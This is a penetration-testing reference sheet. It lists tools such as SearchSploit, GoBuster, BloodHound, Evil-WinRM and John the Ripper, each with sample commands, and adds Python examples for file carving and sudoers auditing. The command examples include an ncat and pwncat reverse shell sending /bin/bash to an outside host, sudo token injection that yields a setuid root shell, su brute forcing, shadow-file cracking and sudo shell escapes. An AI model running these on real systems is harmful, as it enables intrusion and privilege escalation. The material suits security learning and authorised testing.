Reference List
    1. Tnmap
    2. SearchSploit
    3. suBruteForce
    4. sudo_inject
    5. Foremost
    6. Zsteg
    7. ExifTool
    8. GDB
    9. SublimeText
    10. NCat
    11. PwnCat
    12. SeatBelt
    13. GoBuster
    14. SSHuttle
    15. BloodHound
    16. Evil-WinRM
    17. Armitage
    18. FrameBuffer
    19. JohnTheRipper
    20. ColabCat
    21. SMBMap
    22. enum4linux
    23. ProxyChains
    24. HashID
    25. Axel
    26. GettingShell

Tnmap.py – This program breaks a big network into many small segments to enable parallel scans, multi-host task sharing, and more [Link].

tnmap.py 10.0.0.0/8

SearchSploit – A simple way to search for vulnerabilities on a local copy of exploit-db.com [Link]. Other sources of vulnerabilities and exploits are the NIST Search Vulnerability Database [Link], Mitre CVE [Link], and CVE Program Mission [Link].

sudo apt install exploitdb -y
searchsploit wordpress 
sudo -V | grep "Sudo ver"
searchsploit "sudo 1.9.5p1"

suBruteForce – Full throttle to get access as a specific user [Link].

./suBF.sh -u username -w top12000.txt -t 0.7 -s 0.007

sudo_inject – Injects into processes that have a valid sudo token and activates our own sudo token [Link].

Will create the binary activate_sudo_token in /tmp. You can use it to activate the sudo token in your session:

bash exploit.sh
/tmp/activate_sudo_token
sudo su

Will create a sh shell in /tmp owned by root with setuid:

bash exploit_v2.sh
/tmp/sh -p

Will create a sudoers file that makes sudo tokens eternal and allows all users to use sudo:

bash exploit_v3.sh
sudo su

Foremost – A forensics tool to recover files based on headers and footers from disk or image file [Link].

sudo apt install foremost
foremost -t jpg,pdf -i image.dd
foremost -t doc,xml -i /dev/sdb1
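How header/footer carving works, as an added example (not Foremost's code and not from the original page): it scans a raw byte image for a type's start marker and cuts at the matching end marker. The signature table, the size limit and the sample image are constructed for illustration.

```python
"""Header/footer file carving, the idea behind `foremost -t jpg,pdf`.
Added example; the signatures and the sample image are constructed."""

# (header, footer) magic bytes per type. Real carvers keep many more
# signatures and per-type size limits; these are the common markers.
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9"),
    "pdf": (b"%PDF-", b"%%EOF"),
}

def carve(blob, types=("jpg", "pdf"), max_size=10 * 1024 * 1024):
    """Return sorted (offset, type, data) for each header..footer span."""
    found = []
    for ftype in types:
        header, footer = SIGNATURES[ftype]
        pos = 0
        while (start := blob.find(header, pos)) != -1:
            end = blob.find(footer, start + len(header), start + max_size)
            if end == -1:
                # Header without a footer inside the size limit: the file is
                # truncated or overwritten, so skip it rather than carve junk.
                pos = start + 1
                continue
            end += len(footer)
            found.append((start, ftype, blob[start:end]))
            pos = end
    return sorted(found)

def sample_image():
    """Constructed stand-in for image.dd: slack, JPEG, PDF, cut-off JPEG."""
    jpg = b"\xff\xd8\xff\xe0" + b"JFIF-constructed" + b"\xff\xd9"
    pdf = b"%PDF-1.4\nconstructed body\n%%EOF"
    truncated = b"\xff\xd8\xff\xe0" + b"no footer follows"
    return b"\x00" * 512 + jpg + b"\x00" * 100 + pdf + b"\x00" * 64 + truncated

if __name__ == "__main__":
    for offset, ftype, data in carve(sample_image()):
        print(f"{offset:08d} {ftype} {len(data)} bytes")
```

Carving ignores the file system entirely, so recovered files have no names or timestamps, and fragmented files come out corrupted.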

Zsteg – A Ruby application to detect and extract hidden data in image files [Link].

sudo gem install zsteg
zsteg image.png

ExifTool – An application for reading and writing meta information in a wide variety of files [Link]. Official website [Link].

sudo apt install exiftool
exiftool image.png
exiftool -common image.jpg
exiftool image.jpg | grep GPS
exiftool -all= image.jpg

GDB – The GNU Project debugger, allows one to see what is going on ‘inside’ a program while it executes or what a program was ‘doing’ at the moment it crashed [Link]. Usually used with PEDA (Python Exploit Development Assistance for GDB), which colorizes and displays disassembly codes, registers, memory information during debugging, and adds extra commands [Link].

sudo apt install gdb
gdb executable
(gdb) run

SublimeText – A very sophisticated text editor for code and markup [Link].

wget -qO - https://download.sublimetext.com/sublimehq-pub.gpg | sudo apt-key add -
sudo apt-get install apt-transport-https
echo "deb https://download.sublimetext.com/ apt/stable/" | sudo tee /etc/apt/sources.list.d/sublime-text.list
sudo apt-get update
sudo apt-get install sublime-text
subl script.sh

NCat – A NetCat version by NMAP that accepts SSL [Link].

while true; do sudo ncat --ssl -lv 53 ; done
while true; do ncat --ssl -v 174.88.217.186 53 -e /bin/bash; sleep 5 ; done
python3 -c 'import pty; pty.spawn("/bin/bash")'

PwnCat – A sophisticated bind and reverse shell handler with many features as well as a drop-in replacement or compatible complement to netcat, ncat or socat [Link].

pwncat -l -e '/bin/bash' 4444 -k
pwncat -e '/bin/bash' example.com 4444 --reconn --recon-wait 1
pwncat -e '/bin/bash' example.com 4444 -u --ping-intvl 1

The first example will keep listening (bind shell) even after a disconnect.

The second and third are reverse shells that reconnect if Ctrl+C interrupts them; the third works over UDP.


SeatBelt – Performs a number of security-oriented host-survey safety checks [Link].

Seatbelt.exe -group=all -full
Seatbelt.exe -group=user
Seatbelt.exe -group=system
Seatbelt.exe -group=slack
Seatbelt.exe -group=chromium
Seatbelt.exe -group=misc

GoBuster – A tool to brute-force and discover directories, files, and subdomains [Link].

sudo apt install gobuster
gobuster dir -e -t 50 -u http://example.com/ -w /usr/share/wordlists/dirb/common.txt
gobuster dns -d example.com -w subdomains.txt --wildcard

The first example uses -w to specify the wordlist file, -u to specify the URL or domain, -e for expanded mode, and -t to define the number of threads.

In the second example, dns -d looks for subdomains and --wildcard properly detects the existence of a wildcard (*.example.com).


SSHuttle – Creates a VPN over the SSH tunnel and allows pivoting into the network laterally [Link]. It does not require any installation or root access on the host machine, just SSHuttle on the client is necessary. Note that ICMP (ping) does not work over this VPN.

sudo apt-get install sshuttle -y
sshuttle -r user@host 10.0.0.0/8
sshuttle --dns -vvr user@host 0/0

Use the argument -r to set the credentials used to log in to the host, followed by the network you want to reach over the VPN (10.0.0.0/8 in the first example). With --dns, all DNS requests are also tunneled, and 0/0 means that all traffic must go through the VPN as well.


BloodHound – A GUI to reveal the hidden and often unintended relationships within an Active Directory environment. It can be used to easily gain a deeper understanding of privilege relationships between objects (like users and groups) [Link].

Run the most recent version of the collector file on the PowerShell of a Windows machine that is connected to an Active Directory:

.\AzureHound.ps1

OR

.\SharpHound.exe

Then transfer the output to the machine where the BloodHound will analyze it.

It can be installed using the official tutorial [Link] or if you are using Kali just follow the commands:

sudo apt-get install bloodhound -y 
sudo neo4j console &
bloodhound &

Go to the page http://localhost:7474/ and enter neo4j as user and password, then change them on the next page.

Use the credentials changed above to connect and import the acquired output files into BloodHound.


Evil-WinRM – WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management Protocol [Link]. This app gives a remote PowerShell prompt. It can run locally or in a Docker container.

evil-winrm -i 10.0.0.1 -u user -p password

Armitage – A free GUI for Metasploit [Link]. See also the licensed GUI for Metasploit called Cobalt Strike at [Link].

sudo msfdb init
sudo apt install armitage -y
sudo armitage

FrameBuffer – It is not a tool but a technique to capture the physical video output and export it to a file to be visualized or stored. It needs the resolution information to make it visible later.

cat /dev/fb0 > fb.raw
cat /sys/class/graphics/fb0/virtual_size

Now use GIMP to visualize the file.


JohnTheRipper – Tool for cracking hashes [Link]. It is able to find out what kind of hash is being used and adjust the parameters for it automatically.

john single_password.txt
john -w:password.lst user:pass.lst
sudo john /etc/passwd /etc/shadow

58k English words list in upper and lower case [Link].

Tools attached to John:

sudo unshadow /etc/passwd /etc/shadow > unshadow.txt
unique -v -inp=allwords.lst uniques.lst

ColabCat – Use Google Research Colab’s GPU resources to crack hashes with HashCat: go to [Link] and follow the steps. It is also possible to run John there.

!bash
apt update
apt install john
echo "b50ac41ec20631c7b6be72f070d8ff67" > pass
cat pass
john pass

SMBMap – Lists share drives, permissions, shared contents, uploads/downloads, and even executes remote commands [Link].

smbmap -H 10.0.0.1 -R
smbmap -u user -p password -H host

enum4linux – A combination of the Samba tools smbclient, rpcclient, net, and nmblookup, used for enumeration [Link].

enum4linux.pl -v 10.0.0.1
enum4linux.pl -a 10.0.0.1
enum4linux.pl -r 10.0.0.1
enum4linux.pl -u user -p password -U 10.0.0.1

ProxyChains – Forces the TCP connections made by a given application through a chain of proxies such as SOCKS4, SOCKS5, or HTTP [Link].

proxychains nmap 10.0.0.1

Edit the configuration file /etc/proxychains4.conf and customize if necessary:

dynamic_chain
#strict_chain
chain_len = 2
proxy_dns
[ProxyList]
#socks5 127.0.0.1 9150          # would use Tor Network
socks4 200.200.200.200 9050     # a customized proxy
socks4 200.200.200.100 9050     # a customized proxy
socks4 200.200.100.100 9050     # a customized proxy
socks4 200.100.100.100 9050     # a customized proxy

A good source of proxies can be found at [Link].

In case you find the message “an existing sandbox was detected” on the terminal, issue the following command:

sudo firecfg --clean

HashID – Identifies the different types of hashes used to encrypt data and especially passwords [Link]. See also a web tool for the same purpose called TunnelsUp [Link].

pip install hashid
hashid -mj '$2y$10$EtzcwxcVdq7D40GIStLA2u4mxfZfUctoD.fufB7NdAJgjq3ACy2Di'
hashid file.txt

Axel – Axel is a multi-threaded Linux CLI download application [Link]. It works as a download accelerator for the command-line interface.

axel -a -n 6 https://example.com/file.gz

Note: -a only shows the progress and -n 6 defines the number of threads.


GettingShell – It is not a tool but a small collection of unexpected ways to get root access or a shell.

sudo awk 'BEGIN {system("/bin/sh")}'
sudo find /etc -exec sh -i \;

Vim or Vi (command-line text editors), or the application More (which uses Vim), if run by root, can access any file on the system and even start a shell:

  • :e /etc/passwd
    • open the desired file as the running user
  • :sh
    • get a shell as the running user
  • :shell
    • get a shell as the running user
  • :set shell=/bin/bash
    • used to set a non-default shell if necessary
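
A defender's check for the sudo_inject v3 outcome and the sudo one-liners and editor escapes above, as an added example (not from the original page or the tools' authors): it scans sudoers text for tokens that never expire, rules that apply to every user, and allowed commands that can spawn a shell. The function name, the sample policy and the simplified parsing (comments stripped at `#`, no alias or include resolution) are assumptions.

```python
"""Audit sudoers text for the weaknesses this page relies on.
Added example; the sample policy is constructed, not from a real host."""
import os
import re

# Binaries this page shows starting a shell when run through sudo.
SHELL_ESCAPE = {"awk", "find", "vi", "vim", "more"}
RULE = re.compile(r"^(\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(.+)$")
TIMEOUT = re.compile(r"timestamp_timeout\s*=\s*(-?\d+(?:\.\d+)?)")
TAG = re.compile(r"^(?:[A-Z_]+:\s*)+")  # NOPASSWD:, SETENV:, ...

def audit_sudoers(text):
    """Return (line_number, finding) pairs for risky sudoers entries."""
    findings = []
    for num, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # simplification: drop comments
        if not line:
            continue
        if line.startswith("Defaults"):
            m = TIMEOUT.search(line)
            # A negative timeout means the cached sudo token never expires.
            if m and float(m.group(1)) < 0:
                findings.append((num, "sudo token never expires"))
            continue
        m = RULE.match(line)
        if not m:
            continue
        user, commands = m.groups()
        if user == "ALL":
            findings.append((num, "rule applies to every user"))
        for cmd in commands.split(","):
            words = TAG.sub("", cmd.strip()).split()
            name = os.path.basename(words[0]) if words else ""
            if name in SHELL_ESCAPE:
                findings.append((num, f"{name} can spawn a shell"))
    return findings

SAMPLE = """\
# constructed sudoers sample
Defaults env_reset, timestamp_timeout=15
Defaults timestamp_timeout=-1
root    ALL=(ALL:ALL) ALL
ALL     ALL=(ALL) NOPASSWD: ALL
backup  ALL=(root) NOPASSWD: /usr/bin/find /etc *, /usr/bin/tar
deploy  ALL=(root) /usr/bin/systemctl restart app, /usr/bin/vim /etc/app.conf
"""

if __name__ == "__main__":
    for num, finding in audit_sudoers(SAMPLE):
        print(f"line {num}: {finding}")
```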